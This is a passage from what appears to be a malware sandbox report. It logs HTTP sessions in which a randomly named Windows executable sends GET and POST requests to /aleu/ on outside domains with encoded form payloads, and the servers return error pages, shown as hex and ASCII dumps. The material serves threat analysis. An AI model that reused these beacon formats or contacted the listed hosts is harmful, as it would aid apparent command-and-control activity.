                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: normal; font-size: 1.75em; border-bottom: 2px solid #000; }
                                                                                                                                                                          Apr 26, 2024 07:43:45.058088064 CEST1289INData Raw: 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20
                                                                                                                                                                          Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
                                                                                                                                                                          Apr 26, 2024 07:43:45.058135033 CEST1245INData Raw: 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e
                                                                                                                                                                          Data Ascii: oking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your websi


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          28192.168.2.749754162.240.81.18802912C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Apr 26, 2024 07:43:47.579766989 CEST504OUTGET /aleu/?MzYDklf=mEhw182mTcvL4X7W6yJhLslIcG+j3Kkb/q8jOnfIToCvkLfDcLYfug01ytzddJhX/lijb8hpDT2F8KzL6RC5GrlDAC6fqoF7t8GqbmfMFKfVEQELjrUu0IX3uTvnqRm05V4BpU+RhfzS&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Host: www.aprovapapafox.com
                                                                                                                                                                          Connection: close
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Apr 26, 2024 07:43:47.775816917 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                          Server: nginx/1.20.1
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:43:47 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 3650
                                                                                                                                                                          Connection: close
                                                                                                                                                                          ETag: "636d2d22-e42"
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 34 31 37 32 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 37 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20
                                                                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: normal; font-size: 1.75em; border-bottom: 2px solid #000; }
                                                                                                                                                                          Apr 26, 2024 07:43:47.775866032 CEST1289INData Raw: 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20
                                                                                                                                                                          Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #3C6EB4; font-size: 1.1em;
                                                                                                                                                                          Apr 26, 2024 07:43:47.775883913 CEST1245INData Raw: 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e
                                                                                                                                                                          Data Ascii: oking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your websi


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          29192.168.2.749755103.93.124.160802912C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Apr 26, 2024 07:43:54.447371960 CEST738OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.83634.cn
                                                                                                                                                                          Origin: http://www.83634.cn
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 220
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.83634.cn/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Raw: 4d 7a 59 44 6b 6c 66 3d 79 6b 33 52 5a 6d 64 4b 65 79 68 36 57 52 52 58 67 45 6a 53 59 77 76 7a 4e 4e 33 51 6c 50 68 37 6c 70 64 2f 33 39 38 31 79 71 7a 76 4e 76 44 32 49 6b 33 70 34 5a 79 41 42 6c 61 68 30 6d 49 6a 30 39 74 56 30 52 44 70 70 67 36 6d 7a 48 61 6a 34 42 33 79 34 70 6c 4f 75 2b 31 4d 61 49 66 68 66 48 70 67 42 2b 74 48 70 4a 61 33 33 32 6e 46 77 73 58 7a 48 69 75 51 53 70 44 30 41 58 6d 54 72 53 45 59 63 62 4a 72 44 6b 48 62 42 6a 63 35 51 6e 66 62 74 55 33 50 66 67 6a 54 6d 49 30 43 7a 4c 66 59 32 4c 32 4e 2b 74 4c 58 4f 6d 43 31 74 6b 54 56 34 61 61 7a 39 50 64 56 4f 66 68 63 49 78 51 75 4b 75 37 51 68 55 31 6c 75 70 69 35 6e 51 3d 3d
                                                                                                                                                                          Data Ascii: MzYDklf=yk3RZmdKeyh6WRRXgEjSYwvzNN3QlPh7lpd/3981yqzvNvD2Ik3p4ZyABlah0mIj09tV0RDppg6mzHaj4B3y4plOu+1MaIfhfHpgB+tHpJa332nFwsXzHiuQSpD0AXmTrSEYcbJrDkHbBjc5QnfbtU3PfgjTmI0CzLfY2L2N+tLXOmC1tkTV4aaz9PdVOfhcIxQuKu7QhU1lupi5nQ==
                                                                                                                                                                          Apr 26, 2024 07:43:54.799432993 CEST1289INHTTP/1.1 530
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:43:54 GMT
                                                                                                                                                                          Content-Type: text/html;charset=utf-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Server: 8080
                                                                                                                                                                          Data Raw: 31 30 33 65 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e e5 9f 9f e5 90 8d e6 9c aa e9 85 8d e7 bd ae 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 73 74 79 6c 65 3e 0a 2a 2c 20 62 6f 64 79 2c 20 68 74 6d 6c 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 0a 62 6f 64 79 2c 20 68 74 6d 6c 20 7b 0a 20 20 20 20 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 3a 20 31 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 36 34 2c 36 34 2c 36 34 2c 76 61 72 28 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 29 29 3b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 61 6e 74 69 61 6c 69 61 73 65 64 3b 0a 20 20 20 20 2d 6d 6f 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 67 72 61 79 73 63 61 6c 65 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 79 73 74 65 6d 2d 75 69 2c 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 52 6f 62 6f 74 6f 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 41 72 69 61 6c 2c 4e 6f 74 6f 20 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 2c 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 2c 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 7d 0a 2a 20 7b 0a 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 7d 0a 68 74 6d 6c 5b 41 74 74 72 69
                                                                                                                                                                          Data Ascii: 103e<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title></title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><style>*, body, html { margin: 0; padding: 0;}body, html { --text-opacity: 1; color: #404040; color: rgba(64,64,64,var(--text-opacity)); -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; font-family: system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji; font-size: 16px;}* { box-sizing: border-box;}html[Attri
                                                                                                                                                                          Apr 26, 2024 07:43:54.799529076 CEST1289INData Raw: 62 75 74 65 73 20 53 74 79 6c 65 5d 20 7b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 6c 6f 63 61 6c 65 3a 20 22 65 6e 2d 55 53 22 3b 0a 7d 0a 2e 70 2d 30 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 0a 0a 2e 77 2d 32 34 30 20 7b 0a
                                                                                                                                                                          Data Ascii: butes Style] { -webkit-locale: "en-US";}.p-0 { padding: 0;}.w-240 { width: 60rem;}.antialiased { -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;}.pt-10 { padding-top: 2.5rem;}.mb-15
                                                                                                                                                                          Apr 26, 2024 07:43:54.799617052 CEST1289INData Raw: 6d 78 2d 61 75 74 6f 20 70 74 2d 31 30 20 6c 67 3a 70 74 2d 36 20 6c 67 3a 70 78 2d 38 20 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 6c 6c 20 6d 62 2d 31 35 20 61 6e 74 69 61 6c 69 61 73 65 64 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61
                                                                                                                                                                          Data Ascii: mx-auto pt-10 lg:pt-6 lg:px-8 w-240 lg:w-full mb-15 antialiased"> <h1 class="inline-block md:block mr-2 md:mb-2 font-light text-60 md:text-3xl text-black-dark leading-tight"> <span data-translate="error">Error</span>
                                                                                                                                                                          Apr 26, 2024 07:43:54.799721956 CEST458INData Raw: 6c 61 74 65 3d 22 77 68 61 74 5f 63 61 6e 5f 69 5f 64 6f 22 3e e5 a6 82 e4 bd 95 e8 a7 a3 e5 86 b3 3f 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e e8 af b7 e5 88 b0 43 44 4e e5 90 8e e5 8f b0 e6 b7 bb e5 8a a0 e6 ad a4 e5 9f 9f
                                                                                                                                                                          Data Ascii: late="what_can_i_do">?</h2> <p>CDN</p> </div> </section> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          30192.168.2.749756103.93.124.160802912C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Apr 26, 2024 07:43:57.315180063 CEST758OUTPOST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.83634.cn
                                                                                                                                                                          Origin: http://www.83634.cn
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 240
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.83634.cn/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Raw: 4d 7a 59 44 6b 6c 66 3d 79 6b 33 52 5a 6d 64 4b 65 79 68 36 45 41 42 58 73 48 4c 53 51 77 76 77 42 74 33 51 76 76 68 2f 6c 70 52 2f 33 2b 78 79 79 66 72 76 55 4b 2f 32 50 6d 50 70 2f 5a 79 41 4b 46 62 72 77 6d 4a 74 30 39 68 64 30 51 50 70 70 6b 61 6d 7a 47 4b 6a 35 79 66 74 34 35 6c 49 6e 65 31 4f 65 49 66 68 66 48 70 67 42 2f 63 73 70 4a 79 33 33 6d 37 46 69 5a 36 6c 45 69 75 58 46 5a 44 30 52 48 6d 74 72 53 46 50 63 61 56 42 44 6d 2f 62 42 69 73 35 51 30 48 59 6a 6b 32 45 43 77 69 59 70 74 52 58 2b 37 4c 57 36 36 43 78 35 38 48 4c 43 77 66 58 33 47 66 35 6d 4c 69 49 35 4e 35 6a 5a 35 38 70 4b 77 55 32 48 4d 50 78 2b 6a 51 50 6a 37 44 39 78 6c 56 76 58 4b 72 76 55 65 63 67 54 76 2b 34 49 37 2b 59 39 2b 34 3d
                                                                                                                                                                          Data Ascii: MzYDklf=yk3RZmdKeyh6EABXsHLSQwvwBt3Qvvh/lpR/3+xyyfrvUK/2PmPp/ZyAKFbrwmJt09hd0QPppkamzGKj5yft45lIne1OeIfhfHpgB/cspJy33m7FiZ6lEiuXFZD0RHmtrSFPcaVBDm/bBis5Q0HYjk2ECwiYptRX+7LW66Cx58HLCwfX3Gf5mLiI5N5jZ58pKwU2HMPx+jQPj7D9xlVvXKrvUecgTv+4I7+Y9+4=
                                                                                                                                                                          Apr 26, 2024 07:43:57.652977943 CEST1289INHTTP/1.1 530
                                                                                                                                                                          Date: Fri, 26 Apr 2024 05:43:57 GMT
                                                                                                                                                                          Content-Type: text/html;charset=utf-8
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Server: 8080
                                                                                                                                                                          Data Raw: 31 30 33 65 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e e5 9f 9f e5 90 8d e6 9c aa e9 85 8d e7 bd ae 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 73 74 79 6c 65 3e 0a 2a 2c 20 62 6f 64 79 2c 20 68 74 6d 6c 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 0a 62 6f 64 79 2c 20 68 74 6d 6c 20 7b 0a 20 20 20 20 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 3a 20 31 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 36 34 2c 36 34 2c 36 34 2c 76 61 72 28 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 29 29 3b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 61 6e 74 69 61 6c 69 61 73 65 64 3b 0a 20 20 20 20 2d 6d 6f 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 67 72 61 79 73 63 61 6c 65 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 79 73 74 65 6d 2d 75 69 2c 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 